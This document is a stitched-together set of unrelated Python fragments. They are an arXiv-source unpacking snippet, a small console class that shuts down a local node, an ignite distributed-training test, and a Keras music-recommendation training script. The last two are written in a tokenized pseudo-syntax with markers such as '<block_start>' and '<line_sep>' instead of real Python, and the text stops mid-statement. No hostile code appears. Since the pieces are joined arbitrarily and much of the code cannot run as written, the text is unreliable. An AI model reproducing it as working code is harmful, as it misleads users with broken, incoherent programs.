        print(f"Creating directory to hold unpacked sources at {sources_dir}.")
        os.makedirs(sources_dir)

    print(f"Unpacking sources for paper {arxiv_id} into {sources_dir}.")
    unpack_archive(archive_path, sources_dir)
import os
import sys

import requests

from gfl.conf import GflConf


class Shell(object):
    """Minimal interactive console for a running GFL node.

    Supports two commands: ``EXIT`` (ask the node to shut down and quit
    the shell) and ``SHOWCONF <key>`` (print a configuration value).
    """

    # Node endpoint; overwritten by startup()/attach().
    __host = "127.0.0.1"
    __port = 9434

    @classmethod
    def welcome(cls, **kwargs):
        """Print a small banner with this shell's pid."""
        print("------- GFL -------")
        print("%-20s:%s" % ("pid", str(os.getpid())))

    @classmethod
    def attach(cls, host, port):
        """Print the banner, then run the shell against host:port."""
        cls.welcome()
        cls.startup(host=host, port=port)

    @classmethod
    def startup(cls, **kwargs):
        """Run the read-eval loop until the user types EXIT."""
        cls.__host = kwargs.pop("host", "127.0.0.1")
        cls.__port = kwargs.pop("port", GflConf.get_property("api.http.port"))
        while True:
            cmd = input("> ")
            if "EXIT".lower() == cmd.lower():
                cls.exit()
                break
            if cmd.startswith("SHOWCONF"):
                key = cmd[9:].strip()
                print(GflConf.get_property(key))

    @classmethod
    def exit(cls, **kwargs):
        """Ask the node to shut down.

        Best-effort: returns True when the node acknowledged with code 0,
        False on any network or response error.
        """
        req_url = "http://%s:%s/shutdown" % (cls.__host, cls.__port)
        try:
            # The POST now sits inside the try so a connection failure is
            # reported as False instead of propagating out of a
            # "did-shutdown-succeed" query.
            resp = requests.post(req_url)
            data = resp.json()
            return data["code"] == 0
        except (requests.RequestException, ValueError, KeyError, TypeError):
            # Narrowed from a bare ``except:`` so KeyboardInterrupt and
            # SystemExit are no longer swallowed. ValueError covers JSON
            # decode errors; KeyError/TypeError cover malformed payloads.
            return False
<import_stmt>torch<import_stmt>ignite.distributed<as>idist<import_from_stmt>tests.ignite.distributed.utils _sanity_check _test_distrib__get_max_length _test_distrib_all_gather _test_distrib_all_reduce _test_distrib_barrier _test_distrib_broadcast _test_sync <def_stmt>test_no_distrib capsys<block_start><assert_stmt>idist.backend()<is><none><if_stmt>torch.cuda.is_available()<block_start><assert_stmt>idist.device().type<eq>"cuda"<block_end><else_stmt><block_start><assert_stmt>idist.device().type<eq>"cpu"<block_end><assert_stmt>idist.get_rank()<eq>0<assert_stmt>idist.get_world_size()<eq>1<assert_stmt>idist.get_local_rank()<eq>0<assert_stmt>idist.model_name()<eq>"serial"<import_from_stmt>ignite.distributed.utils _model _SerialModel<line_sep>_sanity_check()<assert_stmt>isinstance(_model _SerialModel)<line_sep>idist.show_config()<line_sep>captured=capsys.readouterr()<line_sep>out=captured.err.split("\r")<line_sep>out=list(map(<lambda>x:x.strip() out))<line_sep>out=list(filter(<none> out))<assert_stmt>"ignite.distributed.utils INFO: distributed configuration: serial"<in>out[-1]<assert_stmt>"ignite.distributed.utils INFO: backend: None"<in>out[-1]<if_stmt>torch.cuda.is_available()<block_start><assert_stmt>"ignite.distributed.utils INFO: device: cuda"<in>out[-1]<block_end><else_stmt><block_start><assert_stmt>"ignite.distributed.utils INFO: device: cpu"<in>out[-1]<block_end><assert_stmt>"ignite.distributed.utils INFO: rank: 0"<in>out[-1]<assert_stmt>"ignite.distributed.utils INFO: local rank: 0"<in>out[-1]<assert_stmt>"ignite.distributed.utils INFO: world size: 1"<in>out[-1]<block_end><def_stmt>test_sync_no_dist <block_start><import_from_stmt>ignite.distributed.comp_models _SerialModel<line_sep>_test_sync(_SerialModel)<block_end><def_stmt>test_idist_methods_no_dist <block_start><assert_stmt>idist.get_world_size()<l>2<assert_stmt>idist.backend()<is><none> f"{idist.backend()}"<block_end><def_stmt>test_idist__model_methods_no_dist 
<block_start>_test_distrib__get_max_length("cpu")<if_stmt>torch.cuda.device_count()<g>1<block_start>_test_distrib__get_max_length("cuda")<block_end><block_end><def_stmt>test_idist_collective_ops_no_dist <block_start>_test_distrib_all_reduce("cpu")<line_sep>_test_distrib_all_gather("cpu")<line_sep>_test_distrib_barrier("cpu")<line_sep>_test_distrib_broadcast("cpu")<if_stmt>torch.cuda.device_count()<g>1<block_start>_test_distrib_all_reduce("cuda")<line_sep>_test_distrib_all_gather("cuda")<line_sep>_test_distrib_barrier("cuda")<line_sep>_test_distrib_broadcast("cuda")<block_end><block_end>
<import_from_future_stmt> print_function<import_stmt>argparse<import_from_stmt>collections OrderedDict<import_stmt>json<import_stmt>os<import_stmt>logging<import_from_stmt>keras.callbacks EarlyStopping<import_from_stmt>sklearn.preprocessing normalize<import_from_stmt>sklearn.metrics roc_curve auc roc_auc_score precision_score recall_score f1_score accuracy_score average_precision_score<import_from_stmt>scipy.sparse csr_matrix<import_from_stmt>keras.utils.io_utils HDF5Matrix<line_sep>#from keras.utils.visualize_util import plot <import_from_stmt>keras.optimizers SGD Adam<import_from_stmt>sklearn.metrics r2_score<import_stmt>numpy<as>np<import_stmt>theano.tensor<as>tt<import_stmt>pandas<as>pd<import_stmt>random<import_stmt>common<import_stmt>models<import_from_stmt>predict obtain_predictions<import_from_stmt>eval do_eval<import_stmt>h5py<class_stmt>Config(object)<block_start>"""Configuration for the training process."""<def_stmt>__init__ self params normalize=<false> whiten=<true><block_start>self.model_id=common.get_next_model_id()<line_sep>self.norm=normalize<line_sep>self.whiten=whiten<line_sep>self.x_path='%s_%sx%s'%(params['dataset']['dataset'] params['dataset']['npatches'] params['dataset']['window'])<line_sep>self.y_path='%s_%s_%s'%(params['dataset']['fact'] params['dataset']['dim'] params['dataset']['dataset'])<line_sep>self.dataset_settings=params['dataset']<line_sep>self.training_params=params['training']<line_sep>self.model_arch=params['cnn']<line_sep>self.predicting_params=params['predicting']<block_end><def_stmt>get_dict self<block_start>object_dict=self.__dict__<line_sep>first_key="model_id"<line_sep>conf_dict=OrderedDict({first_key:object_dict[first_key]})<line_sep>conf_dict.update(object_dict)<line_sep><return>conf_dict<block_end><block_end><def_stmt>_squared_magnitude x<block_start><return>tt.sqr(x).sum(axis=-1)<block_end><def_stmt>_magnitude x<block_start><return>tt.sqrt(tt.maximum(_squared_magnitude(x) 
np.finfo(x.dtype).tiny))<block_end><def_stmt>cosine x y<block_start><return>tt.clip((1-(x<times>y).sum(axis=-1)/(_magnitude(x)<times>_magnitude(y)))/2 0 1)<block_end><def_stmt>load_sparse_csr filename<block_start>loader=np.load(filename)<line_sep><return>csr_matrix((loader['data'] loader['indices'] loader['indptr']) shape=loader['shape'])<block_end><def_stmt>build_model config<block_start>"""Builds the cnn."""<line_sep>params=config.model_arch<line_sep>get_model=getattr(models 'get_model_'+str(params['architecture']))<line_sep>model=get_model(params)<line_sep>#model = model_kenun.build_convnet_model(params) # Learning setup t_params=config.training_params<line_sep>sgd=SGD(lr=t_params["learning_rate"] decay=t_params["decay"] momentum=t_params["momentum"] nesterov=t_params["nesterov"])<line_sep>adam=Adam(lr=0.001 beta_1=0.9 beta_2=0.999 epsilon=1e-08)<line_sep>optimizer=eval(t_params['optimizer'])<line_sep>metrics=['mean_squared_error']<if_stmt>config.model_arch["final_activation"]<eq>'softmax'<block_start>metrics.append('categorical_accuracy')<block_end><if_stmt>t_params['loss_func']<eq>'cosine'<block_start>loss_func=eval(t_params['loss_func'])<block_end><else_stmt><block_start>loss_func=t_params['loss_func']<block_end>model.compile(loss=loss_func optimizer=optimizer metrics=metrics)<line_sep><return>model<block_end><def_stmt>load_data_preprocesed params X_path Y_path dataset val_percent test_percent n_samples with_metadata=<false> only_metadata=<false> metadata_source='rovi'<block_start>factors=np.load(common.DATASETS_DIR+'/y_train_'+Y_path+'.npy')# OJO remove S index_factors=open(common.DATASETS_DIR+'/items_index_train_'+dataset+'.tsv').read().splitlines()<if_stmt><not>only_metadata<block_start>all_X=np.load(common.TRAINDATA_DIR+'/X_train_'+X_path+'.npy')<line_sep>index_train=open(common.TRAINDATA_DIR+'/index_train_%s.tsv'%(X_path)).read().splitlines()<line_sep>all_Y=np.zeros((len(index_train) factors.shape[1]))<line_sep>index_factors_inv=dict()<for_stmt>i,item 
enumerate(index_factors)<block_start>index_factors_inv[item]=i<block_end><for_stmt>i,item enumerate(index_train)<block_start>all_Y[i :]=factors[index_factors_inv[item]]<block_end><block_end><else_stmt><block_start>all_Y=factors<block_end><if_stmt>with_metadata<block_start><if_stmt>'w2v'<in>metadata_source<block_start>all_X_meta=np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy'%(metadata_source dataset))[: :int(params['cnn']['sequence_length'])]<block_end><elif_stmt>'model'<in>metadata_source<or><not>params['dataset']['sparse']<block_start>all_X_meta=np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy'%(metadata_source dataset))<block_end><else_stmt><block_start>all_X_meta=load_sparse_csr(common.TRAINDATA_DIR+'/X_train_%s_%s.npz'%(metadata_source dataset)).todense()<block_end>all_X_in_meta=all_X=all_X_meta<block_end>print(all_X.shape)<line_sep>print(all_Y.shape)<if_stmt>n_samples<ne>'all'<block_start>n_samples=int(n_samples)<line_sep>all_X=all_X[:n_samples]<line_sep>all_Y=all_Y[:n_samples]<if_stmt>with_metadata<block_start>all_X_in_meta=all_X_in_meta[:n_samples]<block_end><block_end><if_stmt>params['training']['normalize_y']<eq><true><block_start>normalize(all_Y copy=<false>)<block_end><if_stmt>params['training']["val_from_file"]<block_start>Y_val=np.load(common.DATASETS_DIR+'/y_val_'+Y_path+'.npy')<line_sep>Y_test=np.load(common.DATASETS_DIR+'/y_test_'+Y_path+'.npy')#!!! 
OJO remove S from trainS <if_stmt>params['dataset']['sparse']<block_start>X_val=load_sparse_csr(common.TRAINDATA_DIR+'/X_val_%s_%s.npz'%(metadata_source dataset)).todense()<line_sep>X_test=load_sparse_csr(common.TRAINDATA_DIR+'/X_test_%s_%s.npz'%(metadata_source dataset)).todense()<block_end><else_stmt><block_start>X_val=np.load(common.TRAINDATA_DIR+'/X_val_%s_%s.npy'%(metadata_source dataset))<line_sep>X_test=np.load(common.TRAINDATA_DIR+'/X_test_%s_%s.npy'%(metadata_source dataset))<block_end>X_train=all_X<line_sep>Y_train=all_Y<block_end><else_stmt><block_start>N=all_Y.shape[0]<line_sep>train_percent=1-val_percent-test_percent<line_sep>N_train=int(train_percent<times>N)<line_sep>N_val=int(val_percent<times>N)<line_sep>logging.debug("Training data points: %d"%N_train)<line_sep>logging.debug("Validation data points: %d"%N_val)<line_sep>logging.debug("Test data points: %d"%(N-N_train-N_val))<if_stmt><not>only_metadata# Slice data <block_start>X_train=all_X[:N_train]<line_sep>X_val=all_X[N_train:N_train+N_val]<line_sep>X_test=all_X[N_train+N_val:]<block_end>Y_train=all_Y[:N_train]<line_sep>Y_val=all_Y[N_train:N_train+N_val]<line_sep>Y_test=all_Y[N_train+N_val:]<if_stmt>with_metadata<block_start><if_stmt>only_metadata<block_start>X_train=all_X_in_meta[:N_train]<line_sep>X_val=all_X_in_meta[N_train:N_train+N_val]<line_sep>X_test=all_X_in_meta[N_train+N_val:]<block_end><else_stmt><block_start>X_train=[X_train all_X_in_meta[:N_train]]<line_sep>X_val=[X_val all_X_in_meta[N_train:N_train+N_val]]<line_sep>X_test=[X_test all_X_in_meta[N_train+N_val:]]<block_end><block_end><block_end><return>X_train Y_train X_val Y_val X_test Y_test<block_end><def_stmt>load_data_hf5 params val_percent test_percent<block_start>hdf5_file=common.PATCHES_DIR+"/patches_train_%s_%s.hdf5"%(params['dataset']['dataset'] params['dataset']['window'])<line_sep>f=h5py.File(hdf5_file 
"r")<line_sep>N=f["targets"].shape[0]<line_sep>f.close()<line_sep>train_percent=1-val_percent-test_percent<line_sep>N_train=int(train_percent<times>N)<line_sep>N_val=int(val_percent<times>N)<line_sep>X_train=HDF5Matrix(hdf5_file 'features' start=0 end=N_train)<line_sep>Y_train=HDF5Matrix(hdf5_file 'targets' start=0 end=N_train)<line_sep>X_val=HDF5Matrix(hdf5_file 'features' start=N_train end=N_train+N_val)<line_sep>Y_val=HDF5Matrix(hdf5_file 'targets' start=N_train end=N_train+N_val)<line_sep>X_test=HDF5Matrix(hdf5_file 'features' start=N_train+N_val end=N)<line_sep>Y_test=HDF5Matrix(hdf5_file 'targets' start=N_train+N_val end=N)<line_sep><return>X_train Y_train X_val Y_val X_test Y_test N_train<block_end><def_stmt>load_data_hf5_memory params val_percent test_percent y_path id2gt X_meta=<none> val_from_file=<false><block_start><if_stmt>val_from_file<block_start>hdf5_file=common.PATCHES_DIR+"/patches_train_%s_%sx%s.hdf5"%(params['dataset']['dataset'] params['dataset']['npatches'] params['dataset']['window'])<line_sep>f=h5py.File(hdf5_file "r")<line_sep>index_train=f["index"][:]<line_sep>index_train=np.delete(index_train np.where(index_train<eq>""))<line_sep>N_train=index_train.shape[0]<line_sep>val_hdf5_file=common.PATCHES_DIR+"/patches_val_%s_%sx%s.hdf5"%(params['dataset']['dataset'] params['dataset']['npatches'] params['dataset']['window'])<line_sep>f_val=h5py.File(val_hdf5_file "r")<line_sep>X_val=f_val['features'][:]<line_sep>#Y_val = f_val['targets'][:] factors_val=np.load(common.DATASETS_DIR+'/y_val_'+y_path+'.npy')<line_sep>index_factors_val=open(common.DATASETS_DIR+'/items_index_val_'+params['dataset']['dataset']+'.tsv').read().splitlines()<line_sep>id2gt_val=dict((index factor)<for>(index factor) zip(index_factors_val factors_val))<line_sep>index_val=[i<for>i f_val['index'][:]<if>i<in>id2gt_val]<line_sep>X_val=np.delete(X_val np.where(index_val<eq>"") axis=0)<line_sep>index_val=np.delete(index_val 
np.where(index_val<eq>""))<line_sep>Y_val=np.asarray([id2gt_val[id]<for>id index_val])<line_sep>test_hdf5_file=common.PATCHES_DIR+"/patches_test_%s_%sx%s.hdf5"%(params['dataset']['dataset'] params['dataset']['npatches'] params['dataset']['window'])<line_sep>f_test=h5py.File(test_hdf5_file "r")<line_sep>X_test=f_test['features'][:]<line_sep>#Y_test = f_test['targets'][:] factors_test=np.load(common.DATASETS_DIR+'/y_test_'+y_path+'.npy')<line_sep>index_factors_test=open(common.DATASETS_DIR+'/items_index_test_'+params['dataset']['dataset']+'.tsv').read().splitlines()<line_sep>id2gt_test=dict((index factor)<for>(index factor) zip(index_factors_test factors_test))<line_sep>index_test=[i<for>i f_test['index'][:]<if>i<in>id2gt_test]<line_sep>X_test=np.delete(X_test np.where(index_test<eq>"") axis=0)<line_sep>index_test=np.delete(index_test np.where(index_test<eq>""))<line_sep>Y_test=np.asarray([id2gt_test[id]<for>id index_test])<block_end><else_stmt><block_start>hdf5_file=common.PATCHES_DIR+"/patches_train_%s_%sx%s.hdf5"%(params['dataset']['dataset'] params['dataset']['npatches'] params['dataset']['window'])<line_sep>f=h5py.File(hdf5_file "r")<line_sep>index_all=f["index"][:]<line_sep>N=index_all.shape[0]<line_sep>train_percent=1-val_percent-test_percent<line_sep>N_train=int(train_percent<times>N)<line_sep>N_val=int(val_percent<times>N)<line_sep>X_val=f['features'][N_train:N_train+N_val]<line_sep>index_val=f['index'][N_train:N_train+N_val]<line_sep>X_val=np.delete(X_val np.where(index_val<eq>"") axis=0)<line_sep>index_val=np.delete(index_val np.where(index_val<eq>""))<line_sep>Y_val=np.asarray([id2gt[id]<for>id index_val])<line_sep>X_test=f['features'][N_train+N_val:N]<line_sep>index_test=f['index'][N_train+N_val:N]<line_sep>print(index_test.shape)<line_sep>print(X_test.shape)<line_sep>X_test=np.delete(X_test np.where(index_test<eq>"") axis=0)<line_sep>index_test=np.delete(index_test 
np.where(index_test<eq>""))<line_sep>print(index_test.shape)<line_sep>print(X_test.shape)<line_sep>Y_test=np.asarray([id2gt[id]<for>id index_test])<line_sep>print(Y_test.shape)<line_sep>index_train=f['index'][:N_train]<line_sep>index_train=np.delete(index_train np.where(index_train<eq>""))<line_sep>N_train=index_train.shape[0]<block_end><if_stmt>X_meta<ne><none><block_start>X_val=[X_val X_meta[N_train:N_train+N_val]]<line_sep>X_test=[X_test X_meta[N_train+N_val:N]]<block_end><return>X_val Y_val X_test Y_test N_train<block_end><def_stmt>batch_block_generator params y_path N_train id2gt X_meta=<none> val_from_file=<false><block_start>hdf5_file=common.PATCHES_DIR+"/patches_train_%s_%sx%s.hdf5"%(params['dataset']['dataset'] params['dataset']['npatches'] params['dataset']['window'])<line_sep>f=h5py.File(hdf5_file "r")<line_sep>block_step=50000<line_sep>batch_size=params['training']['n_minibatch']<line_sep>randomize=<true><line_sep>with_meta=<false><if_stmt>X_meta<ne><none><block_start>with_meta=<true><block_end><while_stmt>1<block_start><for_stmt>i range(0 N_train block_step)<block_start>x_block=f['features'][i:min(N_train i+block_step)]<line_sep>index_block=f['index'][i:min(N_train i+block_step)]<line_sep>#y_block = f['targets'][i:min(N_train,i+block_step)] x_block=np.delete(x_block np.where(index_block<eq>"") axis=0)<line_sep>index_block=np.delete(index_block np.where(index_block<eq>""))<line_sep>y_block=np.asarray([id2gt[id]<for>id index_block])<if_stmt>params['training']['normalize_y']<block_start>normalize(y_block copy=<false>)<block_end>items_list=range(x_block.shape[0])<if_stmt>randomize<block_start>random.shuffle(items_list)<block_end><for_stmt>j range(0 len(items_list) batch_size)<block_start><if_stmt>j+batch_size<le>x_block.shape[0]<block_start>items_in_batch=items_list[j:j+batch_size]<line_sep>x_batch=x_block[items_in_batch]<line_sep>y_batch=y_block[items_in_batch]<if_stmt>with_meta<block_start>x_batch=[x_batch 
X_meta[items_in_batch]]<block_end><yield>(x_batch y_batch)<block_end><block_end><block_end><block_end><block_end><def_stmt>process params with_predict=<true> with_eval=<true><block_start>logging.basicConfig(format='%(asctime)s %(message)s' level=logging.DEBUG)<line_sep>params['cnn']['n_out']=int(params['dataset']['dim'])<line_sep>#params['cnn']['n_frames'] = int(params['dataset']['window'] * SR / float(HR)) with_metadata=params['dataset']['with_metadata']<line_sep>only_metadata=params['dataset']['only_metadata']<line_sep>metadata_source=params['dataset']['meta-suffix']<if_stmt>with_metadata<block_start><if_stmt>'w2v'<in>metadata_source<block_start>X_meta=np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy'%(metadata_source params['dataset']['dataset']))[: :int(params['cnn']['sequence_length'])]<line_sep>params['cnn']['n_metafeatures']=len(X_meta[0])<if_stmt>'meta-suffix2'<in>params['dataset']<block_start>X_meta2=np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy'%(params['dataset']['meta-suffix2'] params['dataset']['dataset']))<line_sep>params['cnn']['n_metafeatures2']=len(X_meta2[0])<block_end><if_stmt>'meta-suffix3'<in>params['dataset']<block_start>X_meta3=np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy'%(params['dataset']['meta-suffix3'] params['dataset']['dataset']))<line_sep>params['cnn']['n_metafeatures3']=len(X_meta3[0])<block_end><if_stmt>'meta-suffix4'<in>params['dataset']<block_start>X_meta4=np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy'%(params['dataset']['meta-suffix4'] params['dataset']['dataset']))<line_sep>params['cnn']['n_metafeatures4']=len(X_meta4[0])<block_end><block_end><elif_stmt>'model'<in>metadata_source<or><not>params['dataset']['sparse']<block_start>X_meta=np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy'%(metadata_source 
params['dataset']['dataset']))<line_sep>params['cnn']['n_metafeatures']=len(X_meta[0])<if_stmt>'meta-suffix2'<in>params['dataset']<block_start>X_meta2=np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy'%(params['dataset']['meta-suffix2'] params['dataset']['dataset']))<line_sep>params['cnn']['n_metafeatures2']=len(X_meta2[0])<block_end><if_stmt>'meta-suffix3'<in>params['dataset']<block_start>X_meta3=np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy'%(params['dataset']['meta-suffix3'] params['dataset']['dataset']))<line_sep>params['cnn']['n_metafeatures3']=len(X_meta3[0])<block_end><if_stmt>'meta-suffix4'<in>params['dataset']<block_start>X_meta4=np.load(common.TRAINDATA_DIR+'/X_train_%s_%s.npy'%(params['dataset']['meta-suffix4'] params['dataset']['dataset']))<line_sep>params['cnn']['n_metafeatures4']=len(X_meta4[0])<block_end><block_end><else_stmt><block_start>X_meta=load_sparse_csr(common.TRAINDATA_DIR+'/X_train_%s_%s.npz'%(metadata_source params['dataset']['dataset'])).todense()<line_sep>params['cnn']['n_metafeatures']=X_meta.shape[1]<if_stmt>'meta-suffix2'<in>params['dataset']<block_start>X_meta2=load_sparse_csr(common.TRAINDATA_DIR+'/X_train_%s_%s.npz'%(params['dataset']['meta-suffix2'] params['dataset']['dataset']))<line_sep>params['cnn']['n_metafeatures2']=X_meta2.shape[1]<block_end><if_stmt>'meta-suffix3'<in>params['dataset']<block_start>X_meta3=load_sparse_csr(common.TRAINDATA_DIR+'/X_train_%s_%s.npz'%(params['dataset']['meta-suffix3'] params['dataset']['dataset']))<line_sep>params['cnn']['n_metafeatures3']=len(X_meta3[0])<block_end><if_stmt>'meta-suffix4'<in>params['dataset']<block_start>X_meta4=load_sparse_csr(common.TRAINDATA_DIR+'/X_train_%s_%s.npz'%(params['dataset']['meta-suffix4'] params['dataset']['dataset']))<line_sep>params['cnn']['n_metafeatures3']=len(X_meta4[0])<block_end><block_end>print(X_meta.shape)<block_end><else_stmt><block_start>X_meta=<none><block_end>config=Config(params)<line_sep>model_dir=os.path.join(common.MODELS_DIR 
config.model_id)<line_sep>common.ensure_dir(common.MODELS_DIR)<line_sep>common.ensure_dir(model_dir)<line_sep>model_file=os.path.join(model_dir config.model_id+common.MODEL_EXT)<line_sep>logging.debug("Building Network...")<line_sep>#model = build_model(config) model=build_model(config)<line_sep>print(model.summary())<line_sep>#plot(model, to_file='model2.png', show_shapes=True) trained_model=config.get_dict()<line_sep># Save model #plot(model, to_file=os.path.join(model_dir, config.model_id + PLOT_EXT)) common.save_model(model model_file)<line_sep>logging.debug(trained_model["model_id"])<line_sep>logging.debug("Loading Data...")<line_sep>with_generator=<true><if_stmt>only_metadata<block_start>X_train,Y_train,X_val,Y_val,X_test,Y_test=load_data_preprocesed(params config.x_path config.y_path params['dataset']['dataset'] config.training_params["validation"] config.training_params["test"] config.dataset_settings["nsamples"] with_metadata only_metadata metadata_source)<if_stmt>'meta-suffix2'<in>params['dataset']<block_start>X_train2,Y_train2,X_val2,Y_val2,X_test2,Y_test2=load_data_preprocesed(params config.x_path config.y_path params['dataset']['dataset'] config.training_params["validation"] config.training_params["test"] config.dataset_settings["nsamples"] with_metadata only_metadata params['dataset']['meta-suffix2'])<line_sep>X_train=[X_train X_train2]<line_sep>X_val=[X_val X_val2]<line_sep>X_test=[X_test X_test2]<line_sep>print("X_train bi" len(X_train))<block_end><if_stmt>'meta-suffix3'<in>params['dataset']<block_start>X_train3,Y_train3,X_val3,Y_val3,X_test3,Y_test3=load_data_preprocesed(params config.x_path config.y_path params['dataset']['dataset'] config.training_params["validation"] config.training_params["test"] config.dataset_settings["nsamples"] with_metadata only_metadata params['dataset']['meta-suffix3'])<line_sep>X_train.append(X_train3)<line_sep>X_val.append(X_val3)<line_sep>X_test.append(X_test3)<line_sep>print("X_train tri" 
len(X_train))<block_end><if_stmt>'meta-suffix4'<in>params['dataset']<block_start>X_train4,Y_train4,X_val4,Y_val4,X_test4,Y_test4=load_data_preprocesed(params config.x_path config.y_path params['dataset']['dataset'] config.training_params["validation"] config.training_params["test"] config.dataset_settings["nsamples"] with_metadata only_metadata params['dataset']['meta-suffix4'])<line_sep>X_train.append(X_train4)<line_sep>X_val.append(X_val4)<line_sep>X_test.append(X_test4)<line_sep>print("X_train four" len(X_train))<block_end><block_end><else_stmt><block_start><if_stmt>with_generator<block_start>id2gt=dict()<line_sep>factors=np.load(common.DATASETS_DIR+'/y_train_'+config.y_path+'.npy')<line_sep>index_factors=open(common.DATASETS_DIR+'/items_index_train_'+params['dataset']['dataset']+'.tsv').read().splitlines()<line_sep>id2gt=dict((index factor)<for>(index factor) zip(index_factors factors))<line_sep>X_val,Y_val,X_test,Y_test,N_train=load_data_hf5_memory(params config.training_params["validation"] config.training_params["test"] config.y_path id2gt X_meta config.training_params["val_from_file"])<if_stmt>params['dataset']['nsamples']<ne>'all'<block_start>N_train=min(N_train params['dataset']['nsamples'])<block_end><block_end><else_stmt><block_start>X_train,Y_train,X_val,Y_val,X_test,Y_test,N_train=load_data_hf5(params config.training_params["validation"] config.training_params["test"])<block_end><block_end>trained_model["whiten_scaler"]=common.TRAINDATA_DIR+'/scaler_%s.pk'%config.x_path<line_sep>logging.debug("Training...")<if_stmt>config.model_arch["final_activation"]<eq>'softmax'<block_start>monitor_metric='val_categorical_accuracy'<block_end><else_stmt><block_start>monitor_metric='val_loss'<block_end>early_stopping=EarlyStopping(monitor=monitor_metric patience=4)<if_stmt>only_metadata<block_start>epochs=model.fit(X_train Y_train batch_size=config.training_params["n_minibatch"] #shuffle='batch', nb_epoch=config.training_params["n_epochs"] verbose=1 
validation_data=(X_val Y_val) callbacks=[early_stopping])<block_end><else_stmt><block_start><if_stmt>with_generator<block_start>print(N_train)<line_sep>epochs=model.fit_generator(batch_block_generator(params config.y_path N_train id2gt X_meta config.training_params["val_from_file"]) samples_per_epoch=N_train-(N_train%config.training_params["n_minibatch"]) nb_epoch=config.training_params["n_epochs"] verbose=1 validation_data=(X_val Y_val) callbacks=[early_stopping])<block_end><else_stmt><block_start>epochs=model.fit(X_train Y_train batch_size=config.training_params["n_minibatch"] shuffle='batch' nb_epoch=config.training_params["n_epochs"] verbose=1 validation_data=(X_val Y_val) callbacks=[early_stopping])<block_end><block_end>model.save_weights(os.path.join(model_dir config.model_id+common.WEIGHTS_EXT))<line_sep>logging.debug("Saving trained model %s in %s..."%(trained_model["model_id"] common.DEFAULT_TRAINED_MODELS_FILE))<line_sep>common.save_trained_model(common.DEFAULT_TRAINED_MODELS_FILE trained_model)<line_sep>logging.debug("Evaluating...")<line_sep>print(X_test[0].shape X_test[1].shape)<line_sep>preds=model.predict(X_test)<line_sep>print(preds.shape)<if_stmt>params["dataset"]["evaluation"]<in>['binary' 'multiclass']<block_start>y_pred=(preds<g>0.5).astype('int32')<line_sep>acc=accuracy_score(Y_test y_pred)<line_sep>prec=precision_score(Y_test y_pred average='macro')<line_sep>recall=recall_score(Y_test y_pred average='macro')<line_sep>f1=f1_score(Y_test y_pred average='macro')<line_sep>print('Accuracy' acc)<line_sep>print("%.3f\t%.3f\t%.3f"%(prec recall f1))<block_end><if_stmt>params["dataset"]["fact"]<eq>'class'<block_start>good_classes=np.nonzero(Y_test.sum(0))[0]<line_sep>print(Y_test.shape preds.shape)<line_sep>#roc_auc=roc_auc_score(Y_test[:,good_classes],preds[:,good_classes]) #logging.debug('ROC-AUC '+str(roc_auc)) #pr_auc = average_precision_score(Y_test[:,good_classes],preds[:,good_classes]) #print('PR-AUC',pr_auc) #r2 = roc_auc 
<block_end><elif_stmt>params["dataset"]["evaluation"]<not><in>['binary' 'multiclass' 'multilabel']<block_start>r2s=[]<for_stmt>i,pred enumerate(preds)<block_start>r2=r2_score(Y_test[i] pred)<line_sep>r2s.append(r2)<block_end>r2=np.asarray(r2s).mean()<line_sep>logging.debug('R2 avg '+str(r2))<block_end># Batch prediction <if_stmt>X_test[1].shape<eq>Y_test[1].shape<block_start>score=model.evaluate(X_test Y_test verbose=0)<line_sep>logging.debug(score)<line_sep>logging.debug(model.metrics_names)<line_sep>print(score)<line_sep>trained_model["loss_score"]=score[0]<line_sep>trained_model["mse"]=score[1]<if_stmt>params["dataset"]["evaluation"]<not><in>['binary' 'multiclass' 'multilabel']<block_start>trained_model["r2"]=r2<block_end>fw=open(common.DATA_DIR+'/results/train_results.txt' 'a')<line_sep>fw.write(trained_model["model_id"]+'\n')<if_stmt>params["training"]["loss_func"]<eq>'binary_crossentropy'<block_start>fw.write('ROC-AUC: '+str(roc_auc)+'\n')<line_sep>print('ROC-AUC: '+str(roc_auc))<line_sep>fw.write('Loss: '+str(score[0])+' ('+config.training_params["loss_func"]+')\n')<line_sep>fw.write('MSE: '+str(score[1])+'\n')<block_end><elif_stmt>params["dataset"]["evaluation"]<not><in>['binary' 'multiclass' 'multilabel']<block_start>fw.write('R2 avg: '+str(r2)+'\n')<line_sep>print('R2 avg: '+str(r2))<line_sep>fw.write('Loss: '+str(score[0])+' ('+config.training_params["loss_func"]+')\n')<line_sep>fw.write('MSE: '+str(score[1])+'\n')<block_end>fw.write(json.dumps(epochs.history)+"\n\n")<line_sep>fw.close()<block_end><if_stmt>with_predict<block_start>trained_models=pd.read_csv(common.DEFAULT_TRAINED_MODELS_FILE 
sep='\t')<line_sep>model_config=trained_models[trained_models["model_id"]<eq>trained_model["model_id"]]<line_sep>model_config=model_config.to_dict(orient="list")<line_sep>testset=open(common.DATASETS_DIR+'/items_index_test_%s.tsv'%(config.dataset_settings["dataset"])).read().splitlines()<if_stmt>config.training_params["val_from_file"]<and><not>only_metadata<block_start>predictions,predictions_index=obtain_predictions(model_config testset trained_model["model_id"] config.predicting_params["trim_coeff"] model=model with_metadata=with_metadata only_metadata=only_metadata metadata_source=metadata_source with_patches=<true>)<block_end><else_stmt><block_start>predictions,predictions_index=obtain_predictions(model_config testset trained_model["model_id"] config.predicting_params["trim_coeff"] model=model with_metadata=with_metadata only_metadata=only_metadata metadata_source=metadata_source)<block_end>print("Predictions created")<block_end><if_stmt>with_eval<block_start>do_eval(trained_model["model_id"] get_roc=<true> get_map=<true> get_p=<true> predictions=predictions predictions_index=predictions_index)<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>parser=argparse.ArgumentParser(description='Evaluates the model' formatter_class=argparse.ArgumentDefaultsHelpFormatter)<line_sep>parser.add_argument('-p' '--params' dest="params_file" help='JSON file with params' default=<false>)<line_sep>parser.add_argument('-pred' '--predict' dest="with_predict" help='Predict factors' action='store_true' default=<false>)<line_sep>parser.add_argument('-eval' '--eval' dest="with_eval" 